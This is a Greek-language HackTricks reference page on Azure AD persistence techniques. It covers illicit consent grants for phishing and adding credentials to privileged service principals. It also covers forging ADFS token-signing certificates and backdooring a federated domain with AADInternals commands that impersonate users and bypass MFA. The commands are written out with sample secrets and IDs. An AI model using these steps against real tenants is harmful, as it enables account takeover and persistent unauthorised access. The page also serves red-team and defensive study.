Az - Persistence

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Παράνομη Χορήγηση Συναίνεσης

Από προεπιλογή, οποιοσδήποτε χρήστης μπορεί να καταχωρίσει μια εφαρμογή στο Azure AD. Έτσι, μπορείτε να καταχωρίσετε μια εφαρμογή (μόνο για τον στόχο του tenant) που χρειάζεται δικαιώματα υψηλής επίδρασης με τη συναίνεση του διαχειριστή (και να την εγκρίνετε εάν είστε ο διαχειριστής) - όπως η αποστολή email εκ μέρους ενός χρήστη, διαχείριση ρόλων κ.λπ. Αυτό θα μας επιτρέψει να εκτελέσουμε επιθέσεις phishing που θα ήταν πολύ επιτυχημένες σε περίπτωση επιτυχίας.

Επιπλέον, μπορείτε επίσης να αποδεχτείτε αυτήν την εφαρμογή με τον χρήστη σας ως έναν τρόπο να διατηρήσετε πρόσβαση πάνω της.

Εφαρμογές και Υπηρεσιακοί Υποκείμενοι

Με τα προνόμια του Διαχειριστή Εφαρμογών, GA ή ενός προσαρμοσμένου ρόλου με δικαιώματα ενημέρωσης διαπιστευτηρίων microsoft.directory/applications/credentials, μπορούμε να προσθέσουμε διαπιστευτήρια (κρυφό ή πιστοποιητικό) σε μια υπάρχουσα εφαρμογή.

Είναι δυνατόν να επιτεθείτε σε μια εφαρμογή με υψηλά δικαιώματα ή να προσθέσετε μια νέα εφαρμογή με υψηλά δικαιώματα.

Ένας ενδιαφέρων ρόλος που μπορεί να προστεθεί στην εφαρμογή είναι ο Ρόλος Διαχειριστή Προνομιούχου Ταυτοποίησης, καθώς επιτρέπει την επαναφορά κωδικού πρόσβασης των Γενικών Διαχειριστών.

Αυτή η τεχνική επίσης επιτρέπει την παράκαμψη του MFA.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
  • Για πιστοποίηση βάσει πιστοποιητικού

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Ομοσπονδία - Πιστοποιητικό Υπογραφής Διακριτικού

Με προνόμια DA στον τοπικό AD, είναι δυνατόν να δημιουργήσουμε και να εισαγάγουμε νέα πιστοποιητικά υπογραφής διακριτικού και πιστοποιητικά αποκρυπτογράφησης διακριτικού με πολύ μεγάλη ισχύ. Αυτό θα μας επιτρέψει να συνδεθούμε ως οποιονδήποτε χρήστη του οποίου γνωρίζουμε το ImuutableID.

Εκτελέστε την παρακάτω εντολή ως DA στους διακομιστές ADFS για να δημιουργήσετε νέα πιστοποιητικά (προκαθορισμένος κωδικός πρόσβασης 'AADInternals'), προσθέστε τα στο ADFS, απενεργοποιήστε την αυτόματη ανανέωση και επανεκκινήστε την υπηρεσία:

New-AADIntADFSSelfSignedCertificates

Στη συνέχεια, ενημερώστε τις πληροφορίες του πιστοποιητικού με το Azure AD:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Ένωση - Έμπιστος τομέας

Με τα προνόμια GA σε έναν ενοικιαστή, είναι δυνατόν να προστεθεί ένας νέος τομέας (πρέπει να επαληθευτεί), να διαμορφωθεί ο τύπος πιστοποίησης του σε Ένωση και να διαμορφωθεί ο τομέας για να εμπιστευτεί ένα συγκεκριμένο πιστοποιητικό (any.sts στην παρακάτω εντολή) και έκδοση:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Αναφορές

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated